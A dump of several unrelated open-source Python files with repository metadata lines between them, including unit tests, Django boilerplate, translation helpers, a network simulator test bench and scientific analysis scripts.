# plt.plot(range(len(true_satisfactions)), np.cumsum(true_satisfactions), label=a)
plt.tight_layout()
plt.show()
def get_authenticator(auth_type):
    if auth_type == 'random':
return RandomAuthenticator()
elif auth_type == 'heuristic':
return HeuristicAuthenticator(50)
    elif auth_type == 'oracle':
return OracleAuthenticator()
elif auth_type == 'never_second':
return NeverSecondAuthenticator()
elif auth_type == 'always_second':
return AlwaysSecondAuthenticator()
if __name__ == '__main__':
run_single()
|
devdattakulkarni/test-solum
|
solum/tests/api/handlers/test_workflow.py
|
Python
|
apache-2.0
| 4,365 | 0.000229 |
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from solum.api import auth
from solum.api.handlers import workflow_handler
from solum.openstack.common.fixture import config
from solum.tests import base
from solum.tests import fakes
from solum.tests import utils
@mock.patch('solum.objects.registry')
class TestWorkflowHandler(base.BaseTestCase):
def setUp(self):
super(TestWorkflowHandler, self).setUp()
self.ctx = utils.dummy_context()
self.CONF = self.useFixture(config.Config())
self.CONF.config(auth_uri='http://fakeidentity.com',
group=auth.OPT_GROUP_NAME)
self.CONF.config(keystone_version='3')
def test_workflow_get(self, mock_registry):
mock_registry.return_value.Workflow.get_by_uuid.return_value = {
'app_id': '1234'
}
handler = workflow_handler.WorkflowHandler(self.ctx)
res = handler.get('test_id')
self.assertIsNotNone(res)
get_by_uuid = mock_registry.Workflow.get_by_uuid
get_by_uuid.assert_called_once_with(self.ctx, 'test_id')
def test_workflow_get_all(self, mock_reg):
mock_reg.WorkflowList.get_all.return_value = {}
handler = workflow_handler.WorkflowHandler(self.ctx)
res = handler.get_all(app_id='123')
self.assertIsNotNone(res)
mock_reg.WorkflowList.get_all.assert_called_once_with(self.ctx,
app_id='123')
def test_delete(self, mock_registry):
db_obj = fakes.FakeWorkflow()
mock_registry.Workflow.get_by_uuid.return_value = db_obj
handler = workflow_handler.WorkflowHandler(self.ctx)
handler.delete('test_id')
mock_registry.Workflow.get_by_uuid.assert_called_once_with(self.ctx,
'test_id')
@mock.patch('solum.worker.api.API.build_app')
@mock.patch('solum.objects.sqlalchemy.workflow.Workflow.insert')
def test_create(self, mock_wf_insert, mock_pa, mock_registry):
app_obj = fakes.FakeApp()
app_id = app_obj.id
test_cmd = app_obj.workflow_config['test_cmd']
run_cmd = app_obj.workflow_config['run_cmd']
mock_registry.App.get_by_id.return_value = app_obj
workflow_data = {"actions": ["unittest", "build", "deploy"],
"app_id": app_id,
"source": app_obj.source,
"config": app_obj.workflow_config,
"actions": app_obj.trigger_actions}
fp = fakes.FakePlan()
mock_registry.Plan.return_value = fp
fa = fakes.FakeAssembly()
fa.plan_uuid = fp.uuid
mock_registry.Assembly.return_value = fa
wf_obj = fakes.FakeWorkflow()
wf_obj.app_id = app_obj.id
wf_obj.assembly = fa.id
mock_registry.Workflow.return_value = wf_obj
fi = fakes.FakeImage()
mock_registry.Image.return_value = fi
handler = workflow_handler.WorkflowHandler(self.ctx)
res = handler.create(workflow_data, commit_sha='', status_url='',
du_id='')
self.assertEqual(wf_obj, res)
git_info = {
'source_url': app_obj.source['repository'],
'commit_sha': app_obj.source['revision'],
'repo_token': '',
'status_url': None,
}
mock_pa.assert_called_once_with(
verb='launch_workflow', workflow=['unittest', 'build', 'deploy'],
build_id=fa.id, name=fi.name, assembly_id=fa.id,
git_info=git_info, test_cmd=test_cmd, ports=app_obj.ports,
base_image_id=fi.base_image_id,
source_format=fi.source_format,
image_format=fi.image_format, run_cmd=run_cmd, du_id='')
|
google/fedjax
|
fedjax/fedjax_test.py
|
Python
|
apache-2.0
| 1,219 | 0.003281 |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for fedjax."""
import unittest
import fedjax
class FedjaxTest(unittest.TestCase):
"""Test fedjax can be imported correctly."""
def test_import(self):
self.assertTrue(hasattr(fedjax, 'FederatedAlgorithm'))
self.assertTrue(hasattr(fedjax.aggregators, 'Aggregator'))
self.assertTrue(hasattr(fedjax.algorithms, 'fed_avg'))
self.assertTrue(hasattr(fedjax.datasets, 'emnist'))
self.assertTrue(hasattr(fedjax.models, 'emnist'))
self.assertTrue(hasattr(fedjax.training, 'save_checkpoint'))
def test_no_core(self):
self.assertFalse(hasattr(fedjax, 'core'))
if __name__ == '__main__':
unittest.main()
|
chopmann/warehouse
|
warehouse/i18n/translations.py
|
Python
|
apache-2.0
| 2,912 | 0 |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections.abc
import functools
from jinja2 import contextfunction
from pyramid.threadlocal import get_current_request
class TranslationString:
def __init__(self, message_id, plural=None, n=None, mapping=None):
if mapping is None:
mapping = {}
self.message_id = message_id
self.plural = plural
self.n = n
self.mapping = mapping
if bool(self.plural) != bool(self.n):
raise ValueError("Must specify plural and n together.")
def __repr__(self):
        extra = ""
if self.plural is not None:
extra = " plural={!r} n={!r}".format(self.plural, self.n)
return "<TranslationString: message_id={!r}{}>".format(
            self.message_id,
extra,
)
def __mod__(self, mapping):
if not isinstance(mapping, collections.abc.Mapping):
raise TypeError("Only mappings are supported.")
vals = self.mapping.copy()
vals.update(mapping)
return TranslationString(
self.message_id, self.plural, self.n, mapping=vals,
)
def translate(self, translation):
if self.plural is not None:
result = translation.ngettext(self.message_id, self.plural, self.n)
else:
result = translation.gettext(self.message_id)
return result % self.mapping
class JinjaRequestTranslation:
def __init__(self, domain):
self.domain = domain
@contextfunction
def gettext(self, ctx, *args, **kwargs):
request = ctx.get("request") or get_current_request()
return request.translation.gettext(*args, **kwargs)
@contextfunction
def ngettext(self, ctx, *args, **kwargs):
request = ctx.get("request") or get_current_request()
return request.translation.ngettext(*args, **kwargs)
@contextfunction
def translate_value(ctx, value):
if isinstance(value, TranslationString):
return value.translate(ctx["request"].translation)
return value
def gettext(message_id, **kwargs):
return TranslationString(message_id, mapping=kwargs)
def ngettext(message_id, plural, n=None, **kwargs):
if n is None:
return functools.partial(
TranslationString, message_id, plural, mapping=kwargs
)
return TranslationString(message_id, plural, n, mapping=kwargs)
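# Hedged usage sketch of the helpers above (message ids and mapping keys are
# illustrative; 'translation' stands for whatever gettext translations object
# the current request carries):
#
#   ts = gettext("Hello, %(name)s!", name="World")
#   # ts.translate(translation) applies translation.gettext() and then the
#   # %-mapping, e.g. -> "Hello, World!" for an identity translation.
#   plural_ts = ngettext("one package", "several packages", n=3)
#   # plural_ts.translate(translation) lets translation.ngettext() pick the
#   # plural form for n=3.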
|
Serchcode/cvirtual
|
manage.py
|
Python
|
gpl-3.0
| 806 | 0 |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "cvirtual.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
|
Alt90/Student_progress_bar
|
achievement/migrations/0001_initial.py
|
Python
|
mit
| 819 | 0.003745 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-15 16:12
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Student',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=2000, verbose_name='Имя студента')),
('rating', models.IntegerField(default=0, validators=[django.core.validators.MaxValueValidator(100), django.core.validators.MinValueValidator(0)], verbose_name='Рейтинг')),
],
),
]
|
dfleury/fairu
|
setup.py
|
Python
|
gpl-3.0
| 2,511 | 0.018319 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
from setuptools import setup
from fairu import __version__
def packages():
packages = []
for root, dirnames, filenames in os.walk('fairu'):
if '__init__.py' in filenames:
packages.append(".".join(os.path.split(root)).strip("."))
return packages
def description():
return open('README.md', 'r').read()
def requirements():
lines = open('REQUIREMENTS', 'r').readlines()
requirements = []
for line in lines:
requirements.append(line.replace('\n', ''))
return requirements
def entry_points():
ENTRY_POINTS = {}
try:
from setuptools import Command
except ImportError:
sys.stderr.write("setuptools.Command could not be
|
imported: setuptools "
"extensions not available")
else:
command_hook = "distutils.commands"
ENTRY_POINTS[command_hook] = []
from commands import coverage_analysis
if coverage_analysis.COVERAGE_ANALYSIS_AVAILABLE:
ENTRY_POINTS[command_hook].append("test = commands.coverage_ana"
|
"lysis:CoverageAnalysis")
return ENTRY_POINTS
def get_setup_config():
from ConfigParser import ConfigParser
config = ConfigParser()
config.read('setup.cfg')
    return config
if __name__ == '__main__':
setup(name = 'fairu',
version = __version__,
description = "Fairu is a python library to handle files easily "
"using a chain pattern like the jQuery framework.",
author = 'Diego Fleury',
author_email = 'dfleury@gmail.com',
license = 'GPL',
keywords = "files batch process handling",
url = 'http://github.com/dfleury/fairu',
packages = packages(),
long_description = description(),
entry_points = entry_points(),
classifiers = ["Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers"
"License :: OSI Approved :: GNU General Public "
"License (GPL)"
"Programming Language :: Python :: 2",
"Topic :: Software Development :: Libraries :: "
"Python Modules"],
install_requires = requirements()
)
|
ap--/python-seabreeze
|
src/seabreeze/pyseabreeze/features/databuffer.py
|
Python
|
mit
| 1,040 | 0 |
from seabreeze.pyseabreeze.features._base import SeaBreezeFeature
# Definition
# ==========
#
# TODO: This feature needs to be implemented for pyseabreeze
#
class SeaBreezeDataBufferFeature(SeaBreezeFeature):
identifier = "data_buffer"
def clear(self) -> None:
raise NotImplementedError("implement in derived class")
def remove_oldest_spectra(self, number_of_spectra: int) -> None:
raise NotImplementedError("implement in derived class")
def get_number_of_elements(self) -> int:
raise NotImplementedError("implement in derived class")
def get_buffer_capacity(self) -> int:
raise NotImplementedError("implement in derived class")
def set_buffer_capacity(self, capacity: int) -> None:
raise NotImplementedError("implement in derived class")
def get_buffer_capacity_maximum(self) -> int:
raise NotImplementedError("implement in derived class")
def get_buffer_capacity_minimum(self) -> int:
raise NotImplementedError("implement in derived class")
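# Illustrative sketch only (not part of the pyseabreeze API): a list-backed
# stand-in showing the semantics the abstract interface above implies. A real
# implementation would issue the corresponding device protocol commands.
class _ListBackedDataBufferFeature(SeaBreezeDataBufferFeature):
    _buffer: list = []       # class-level state is fine for a sketch
    _capacity: int = 16      # assumed default, purely illustrative
    def clear(self) -> None:
        self._buffer.clear()
    def remove_oldest_spectra(self, number_of_spectra: int) -> None:
        del self._buffer[:number_of_spectra]
    def get_number_of_elements(self) -> int:
        return len(self._buffer)
    def get_buffer_capacity(self) -> int:
        return self._capacity
    def set_buffer_capacity(self, capacity: int) -> None:
        self._capacity = capacity
    def get_buffer_capacity_maximum(self) -> int:
        return 64            # illustrative upper bound
    def get_buffer_capacity_minimum(self) -> int:
        return 1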
|
sssundar/NetworkSimulator
|
Code/Python/unit_test_benches.py
|
Python
|
gpl-2.0
| 12,927 | 0.044403 |
# Working Unit Test Benches for Network Simulator
# Last Revised: 14 November 2015 by Sushant Sundaresh & Sith Domrongkitchaiporn
'''
IMPORTANT: Please turn off logging (MEASUREMENT_ENABLE = False) in constants.py
before running these testbenches.
'''
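# Optional guard for the note above (assumes MEASUREMENT_ENABLE is a module-level
# boolean in constants.py, as described; adjust if the flag lives elsewhere):
#
#   import constants
#   assert not constants.MEASUREMENT_ENABLE, "disable logging before running these benches"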
# Unit Testing Framework
import unittest
# Test Modules
import reporter, node, host, link, router
import flow, event_simulator, event, events
import link, link_buffer, packet
import constants
from static_flow_test_node import *
import visualize
class testMeasurementAnalysis (unittest.TestCase):
'''
Tests visualize.py time-averaging function
'''
def test_time_averaging (self):
self.assertTrue(visualize.test_windowed_time_average())
class TestStaticDataSinkFlow (unittest.TestCase):
'''
### Might break for dynamic TCP ###
if this is implemented on receiver side as well
Create Flow Data Sink
Create Static_Data_Sink_Test_Node
Tell Flow its number or expected packets
Create Event Simulator
For now:
	Ask flow to receive a packet, check that Ack has same packet ID
Ask flow to receive the same packet again, should get same result.
'''
sim = "" # event simulator
f = "" # flow, data source, static
n = "" # test node
def setUp (self):
self.f = flow.Data_Sink("f1sink","h2","h1",\
3*constants.DATA_PACKET_BITWIDTH, 1.0)
self.n = Static_Data_Sink_Test_Node ("h2","f1sink")
self.sim = event_simulator.Event_Simulator({"f1sink":self.f,"h2":self.n})
self.f.set_flow_size(2)
def test_basic_ack (self):
packets = [ packet.Packet("f1source","h1","h2","",0,0), \
packet.Packet("f1source","h1","h2","",1,0)]
self.n.receive(packets[0])
self.assertEqual(self.n.head_of_tx_buff(),0)
self.n.receive(packets[1])
self.assertEqual(self.n.head_of_tx_buff(),1)
# Two packets received, two packets acknowledged
with self.assertRaises(ValueError):
self.n.head_of_tx_buff()
# Repeated packets just get repeated acks
self.n.receive(packets[1])
self.assertEqual(self.n.head_of_tx_buff(),1)
class TestStaticDataSourceFlow (unittest.TestCase):
'''
### Will break for dynamic TCP ###
Assumes Flow (Data Source) Window Size
hard-coded to 2
Create Flow Data Source
Create Static_Data_Source_Test_Node
Create Event Simulator
Start Flow -> pokes tcp -> sends two packets to Node
Check that these were sent to Node
Fake Acks through Node to Flow
Check that this updates Node Tx_Buffer (more sends from Flow)
Check what Timeout Does
'''
sim = "" # event simulator
f = "" # flow, data source, static
n = "" # test node
def setUp (self):
self.f = flow.Data_Source("f1","h1","h2",\
3*constants.DATA_PACKET_BITWIDTH, 1.0)
self.n = Static_Data_Source_Test_Node ("h1","f1")
self.sim = event_simulator.Event_Simulator({"f1":self.f,"h1":self.n})
def test_static_flow_source (self):
# The first static flow source implementation
# just has packets/acks have the same id.
# There is no chance of 'duplicate acks' to indicate loss
self.f.start() # do this manually so don't have to run simulator
self.assertEqual(self.n.head_of_tx_buff(),0)
packet1 = self.n.tx_buff[0]
self.assertEqual(self.n.head_of_tx_buff(),1)
with self.assertRaises(ValueError):
self.n.head_of_tx_buff()
self.n.receive(packet.Packet("","h2","h1",\
constants.DATA_PACKET_ACKNOWLEDGEMENT_TYPE,\
0,constants.DATA_ACK_BITWIDTH))
self.assertEqual(self.n.head_of_tx_buff(),2)
with self.assertRaises(ValueError):
self.n.head_of_tx_buff()
self.f.time_out(packet1)
# check that next packet has id 1
self.assertEqual(self.n.head_of_tx_buff(),1)
class TestLinkTransmissionEvents(unittest.TestCase):
sim = "" # simulator
link = "" # link
lNode = "" # left node
rNode = "" # right node
lPs = [] # left packets
rPs = [] # right packets
# Create Event Simulator
# Create Link & Nodes (not Hosts, so don't need working Flow) on either side
# Create three packets from either side, to the other, and send them.
def setUp (self):
self.lNode = node.Node("h1")
self.rNode = node.Node("h2")
# don't need flow, as no packet timeouts created to callback to flow
# and node receive is a dummy function
for i in 1, 2, 3:
self.lPs.append(packet.Packet("","h1","h2","data",i,1000)) # 1000kbit
self.rPs.append(packet.Packet("","h2","h1","data",i,1000))
self.link = link.Link("l1", "h1", "h2", 1000.0, 10.0, 3000.0)
# 1000kbit/ms, 10 ms prop delay, 3000kbit buffers
self.sim = event_simulator.Event_Simulator({"l1":self.link, \
"h1":self.lNode, \
"h2":self.rNode})
# Order the packet sends 2L-2R-L-R
# Run Sim Forward
# Watch for transmission events in EventSimulator, with proper timestamp
# Watch for propagation events in EventSimulator, with proper timestamp
# Make sure these are sequential, with only one Tx event at a time in
# the queue, and two propagations in each direction chained, and one isolated.
# Note this tests most events we're trying to deal with.
def test_packet_callbacks_and_timing (self):
self.link.send(self.rPs.pop(0),"h2") # right going packets
# are favored in time tie breaks
self.link.send(self.rPs.pop(0),"h2")
self.link.send(self.rPs.pop(0),"h2")
self.link.send(self.lPs.pop(0),"h1")
# all have timestamp 0.0
# so link should switch directions
# between each packet
# Confirm Handle_Packet_Transmission events show up in EventSim
# with proper timestamps
self.assertTrue(self.sim.get_current_time() == 0)
self.sim.run_next_event()
self.assertTrue(self.sim.get_current_time() == 1)
# right packet1 load
# into channel at
# 1ms going h2->h1
self.assertTrue(self.link.transmission_direction == constants.RTL)
self.sim.run_next_event()
self.assertTrue(self.sim.get_current_time() == 11)
# propagation done
# direction switched
# next packet loaded
# LTR
self.assertTrue(self.link.transmission_direction == constants.LTR)
# next event is a load (12)
# then a propagation (22)
# then
# the next event should be
# both remaining h2 packets
# loaded, as left buffer
# is empty
self.sim.run_next_event()
self.assertTrue(self.sim.get_current_time() == 12)
self.sim.run_next_event()
self.assertTrue(self.sim.get_current_time() == 22)
self.assertTrue(self.link.transmission_direction == constants.RTL)
self.sim.run_next_event()
self.sim.run_next_event() # two loads
self.assertTrue(self.sim.get_current_time() == 24)
self.assertTrue(self.link.transmission_direction == constants.RTL)
self.sim.run_next_event() # two propagations
self.sim.run_next_event()
self.assertTrue(self.link.transmission_direction == constants.RTL)
self.assertTrue(self.sim.get_current_time() == 34)
class TestLinkBuffer(unittest.TestCase):
# test variables
l = "" # a link buffer
p = "" # a packet exactly half the size of the buffer
s = "" # event simulator
def setUp (self):
c = 100 # buffer capacity in bits
self.s = event_simulator.Event_Simulator({})
self.l = link_buffer.LinkBuffer(c)
self.l.set_event_simulator(self.s)
self.p = packet.Packet("","","","","",c/2)
def test_enqueue_dequeue (self):
self.assertTrue(self.l.can_enqueue(self.p))
self.l.enqueue(self.p)
self.assertTrue(self.l.can_enqueue(self.p))
self.l.enqueue(self.p)
self.assertFalse(self.l.can_enqueue(self.p))
self.l.enqueue(self.p) # dropped
self.l.enqueue(self.p) # dropped
self.assertTrue(self.l.can_dequeue())
self.assertTrue( isinstance(self.l.dequeue(),packet.Packet) )
self.assertTrue(self.l.can_dequeue())
self.assertTrue( isinstance(self.l.dequeue(),packet.Packet) )
self.assertFalse(self.l.can_dequeue())
with self.assertRaises(ValueError):
self.l.dequeue()
class TestReporter(unittest.TestCase):
# Set ID of reporter
def test_get_id(self):
ID = "H1"
r = reporter.Reporter(ID)
r.log("Hello World!")
self.assertEqual(r.get_id(), ID)
class Tes
|
YannickDieter/testbeam_analysis
|
testbeam_analysis/examples/eutelescope.py
|
Python
|
mit
| 14,587 | 0.001303 |
''' Example script to run a full analysis on telescope data. The original data
can be found in the example folder of the EUTelescope framework.
Data in https://github.com/eutelescope/eutelescope/tree/v1.0-tag/jobsub/examples/datura-150mm-DAF
The residuals are calculated with different cuts on prealigned and aligned data
for demonstration purposes:
- When only prealigning the DUTs and using all DUT hits and cutting on the chi2:
  The residuals depend strongly on whether the prealignment is sufficient. Residuals
  are usually rather high (several 10 um)
- When aligning the DUTs and only interpolating the tracks from 2 DUTs:
The residual for the planes 2 - 4 (DUT 1 - DUT 3) are about 6.5 um in x/y and
comparable to the residuals from the EuTelescope software (6 um).
- When aligning the DUTs and using all DUT hits and cutting on the chi2:
The residuals and selected number of tracks are highly dependent on the
chi2 cut and are at least 6 um and usually < 10 um depending on the
  plane position. This is an effect of multiple scattering. The outermost planes
  have a rather high residual (~ 18 um)
- When using a Kalman Filter for track building instead of an interpolation
which takes no correlations between the measurements into account, the
residuals can be improved by ~ 30 percent for the inner planes.
Setup
-----
The telescope consists of 6 planes with 15 cm clearance between the planes.
The data was taken at Desy with ~ 5 GeV/c (Run number 36).
The Mimosa26 has an active area of 21.2mm x 10.6mm and the pixel matrix
consists of 1152 columns and 576 rows (18.4um x 18.4um pixel size).
The total size of the chip is 21.5mm x 13.7mm x 0.036mm
(radiation length 9.3660734)
The matrix is divided into 4 areas. For each area the threshold can be set up
individually. The quarters are from column 0-287, 288-575, 576-863 and 864-1151.
The Mimosa26 detects ionizing particles with a density of up to
10^6 hits / cm^2 / s. The hit rate for a beam telescope is ~5 hits / frame.
'''
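# Quick sanity check of the geometry quoted above (18.4 um pitch, 1152 x 576 pixels):
#   1152 * 18.4 um = 21196.8 um ~ 21.2 mm  (active width)
#    576 * 18.4 um = 10598.4 um ~ 10.6 mm  (active height)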
import os
import inspect
import logging
from testbeam_analysis import (hit_analysis, dut_alignment, track_analysis,
result_analysis)
from testbeam_analysis.tools import analysis_utils
logging.basicConfig(
level=logging.INFO, format="%(asctime)s - %(name)s - [%(levelname)-8s]\
(%(threadName)-10s) %(message)s")
def run_analysis(data_files):
# Pixel dimesions and matrix size of the DUTs
pixel_size = [(18.4, 18.4)] * 6 # Column, row pixel pitch in um
n_pixels = [(1152, 576)] * 6 # Number of pixel on column, row
z_positions = [0., 150000, 300000, 450000, 600000, 750000] # z position in um
# Friendly names for plotting
dut_names = ("Tel_0", "Tel_1", "Tel_2", "Tel_3", "Tel_4", "Tel_5")
# Create output subfolder where all output data and plots are stored
output_folder = os.path.join(os.path.split(data_files[0])[0],
'output_eutel')
if not os.path.exists(output_folder):
os.makedirs(output_folder)
# The following shows a complete test beam analysis by calling the
# seperate function in correct order
# Generate noisy pixel mask for all DUTs
for i, data_file in enumerate(data_files):
hit_analysis.generate_pixel_mask(input_hits_file=data_file,
n_pixel=n_pixels[i],
pixel_mask_name='NoisyPixelMask',
pixel_size=pixel_size[i],
threshold=0.5,
dut_name=dut_names[i])
# Cluster hits from all DUTs
for i, data_file in enumerate(data_files):
hit_analysis.cluster_hits(input_hits_file=data_file,
input_noisy_pixel_mask_file=os.path.splitext(data_files[i])[0] + '_noisy_pixel_mask.h5',
min_hit_charge=0,
max_hit_charge=1,
column_cluster_distance=3,
row_cluster_distance=3,
frame_cluster_distance=1,
dut_name=dut_names[i])
# Generate filenames for cluster data
input_cluster_files = [os.path.splitext(data_file)[0] + '_clustered.h5'
for data_file in data_files]
    # Correlate the row / column of each DUT
dut_alignment.correlate_cluster(input_cluster_files=input_cluster_files,
output_correlation_file=os.path.join(
output_folder, 'Correlation.h5'),
n_pixels=n_pixels,
pixel_size=pixel_size,
dut_names=dut_names)
# Create prealignment relative to the first DUT from the correlation data
input_correlation_file = os.path.join(output_folder, 'Correlation.h5')
dut_alignment.prealignment(input_correlation_file=input_correlation_file,
output_alignment_file=os.path.join(
output_folder, 'Alignment.h5'),
z_positions=z_positions,
pixel_size=pixel_size,
dut_names=dut_names,
# This data has several tracks per event and
# noisy pixel, thus fit existing background
fit_background=True,
# Tries to find cuts automatically;
# deactivate to do this manualy
non_interactive=True)
# Merge the cluster tables to one merged table aligned at the event number
dut_alignment.merge_cluster_data(input_cluster_files=input_cluster_files,
output_merged_file=os.path.join(
output_folder, 'Merged.h5'),
n_pixels=n_pixels,
pixel_size=pixel_size)
# Apply the prealignment to the merged cluster table to create tracklets
dut_alignment.apply_alignment(
input_hit_file=os.path.join(output_folder, 'Merged.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_hit_file=os.path.join(output_folder,
'Tracklets_prealigned.h5'),
force_prealignment=True)
# Find tracks from the prealigned tracklets and stores them with quality
# indicator into track candidates table
track_analysis.find_tracks(
input_tracklets_file=os.path.join(output_folder,
'Tracklets_prealigned.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_track_candidates_file=os.path.join(
output_folder, 'TrackCandidates_prealignment.h5')
)
# The following two steps are for demonstration only.
# They show track fitting and residual calculation on
# prealigned hits. Usually you are not interested in this and will use
# the aligned hits directly.
# Step 1.: Fit the track candidates and create new track table (using the
# prealignment!)
track_analysis.fit_tracks(
input_track_candidates_file=os.path.join(
output_folder, 'TrackCandidates_prealignment.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_tracks_file=os.path.join(output_folder, 'Tracks_prealigned.h5'),
# To get unconstrained residuals do not use DUT
# hit for track fit
exclude_dut_hit=True,
# This is just for demonstration purpose, usually
# uses fully aligned hits
force_prealignment=True,
selection_track_quality=0) # We will cut on chi2
# Step 2.: Calculate the residuals to check the alignment (using the
#
|
Micronaet/micronaet-migration
|
sale_exchange/__init__.py
|
Python
|
agpl-3.0
| 1,139 | 0.002634 |
# -*- coding: utf-8 -*-
###############################################################################
#
# ODOO (ex OpenERP)
# Open Source Management Solution
# Copyright (C) 2001-2015 Micronaet S.r.l. (<http://www.micronaet.it>)
# Developer: Nicola Riolini @thebrush (<https://it.linkedin.com/in/thebrush>)
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
#    See the GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from . import exchange
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
aewallin/openvoronoi
|
python_examples/spike_1.py
|
Python
|
lgpl-2.1
| 4,238 | 0.001416 |
import openvoronoi as ovd
import ovdvtk
import time
import vtk
import datetime
import math
import random
import os
import sys
import pickle
import gzip
if __name__ == "__main__":
# w=2500
# h=1500
# w=1920
# h=1080
w = 1024
h = 1024
myscreen = ovdvtk.VTKScreen(width=w, height=h)
ovdvtk.drawOCLtext(myscreen, rev_text=ovd.version())
w2if = vtk.vtkWindowToImageFilter()
w2if.SetInput(myscreen.renWin)
lwr = vtk.vtkPNGWriter()
lwr.SetInputConnection(w2if.GetOutputPort())
# w2if.Modified()
# lwr.SetFileName("tux1.png")
scale = 1
myscreen.render()
random.seed(42)
far = 1
camPos = far
zmult = 3
# camPos/float(1000)
myscreen.camera.SetPosition(0, -camPos / float(1000), zmult * camPos)
myscreen.camera.SetClippingRange(-(zmult + 1) * camPos, (zmult + 1) * camPos)
myscreen.camera.SetFocalPoint(0.0, 0, 0)
vd = ovd.VoronoiDiagram(far, 120)
print ovd.version()
# for vtk visualization
vod = ovdvtk.VD(myscreen, vd, float(scale), textscale=0.01, vertexradius=0.003)
vod.drawFarCircle()
vod.textScale = 0.02
vod.vertexRadius = 0.0031
vod.drawVertices = 0
vod.drawVertexIndex = 1
vod.drawGenerators = 0
vod.offsetEdges = 1
vd.setEdgeOffset(0.05)
linesegs = 1 # switch to turn on/off line-segments
segs = []
# ovd.Point(1,1)
eps = 0.9
p1 = ovd.Point(-0.1, -0.2)
p2 = ovd.Point(0.2, 0.1)
p3 = ovd.Point(0.4, 0.2)
p4 = ovd.Point(0.6, 0.6)
p5 = ovd.Point(-0.6, 0.3)
pts = [p1, p2, p3, p4, p5]
# t_after = time.time()
# print ".done in {0:.3f} s.".format( t_after-t_before )
times = []
id_list = []
m = 0
t_before = time.time()
for p in pts:
id_list.append(vd.addVertexSite(p))
# print m," added vertex", seg_id[0]
m = m + 1
t_after = time.time()
times.append(t_after - t_before)
# exit()
# print " ",2*Nmax," point-sites sites took {0:.3f}".format(times[0])," seconds, {0:.2f}".format( 1e6*float( times[0] )/(float(2*Nmax)*float(math.log10(2*Nmax))) ) ,"us/n*log(n)"
print "all point sites inserted. ",
vd.check()
# nsegs = Nmax
# nsegs = 5 #Nmax
# n=1
t_before = time.time()
# vd.debug_on()
vd.addLineSite(id_list[0], id_list[1])
# vd.check()
# vd.debug_on()
    vd.addLineSite(id_list[1], id_list[2])
# vd.check()
# vd.addLineSite( id_list[2], id_list[3])
# vd.check()
# vd.debug_on()
# vd.addLineSite( id_list[3], id_list[4])
# vd.check()
vd.debug_on()
vd.addLineSite(id_list[4], id_list[1], 10) # FIXME spikes are not allowed, so this does not complete OK
# vd.check()
t_after = time.time()
line_time = t_after - t_before
if line_time < 1e-3:
line_time = 1
times.append(line_time)
# s = id_list[nsegs]
# vd.debug_on()
# vd.addLineSite( s[0], s[1], 10)
# seg = id_list[nsegs]
# vd.addLineSite(seg[0],seg[1],10)
# 1 identify start/endvert
# 2 add line-segment edges/sites to graph
# 3 identify seed-vertex
# 4 create delete-tree
# 5 process/create null faces at start/end
# 6 create LineSite and add pseudo-edges
# 7 create NEW vertices on IN-OUT edges
# 8 add positive/start separator edge
# 9 add negative/start separator edge
# 10 add positive/end separator edge
# 5 create new vertices
# 6 add startpoint pos separator
# 7 add startpoint neg separator
# 8 add end-point pos separator
# 9 add end-point neg separator
# 10 add new edges
# 11 delete delete-tree edges
# 12 reset status
vod.setVDText2(times)
err = vd.getStat()
# print err
print "got errorstats for ", len(err), " points"
if len(err) > 1:
minerr = min(err)
maxerr = max(err)
print "min error= ", minerr
print "max error= ", maxerr
print "num vertices: ", vd.numVertices()
print "num SPLIT vertices: ", vd.numSplitVertices()
calctime = t_after - t_before
vod.setAll()
print "PYTHON All DONE."
myscreen.render()
# w2if.Modified()
# lwr.SetFileName("{0}.png".format(Nmax))
# lwr.Write()
myscreen.iren.Start()
|
relic7/prodimages
|
python/DirWatchManager.py
|
Python
|
mit
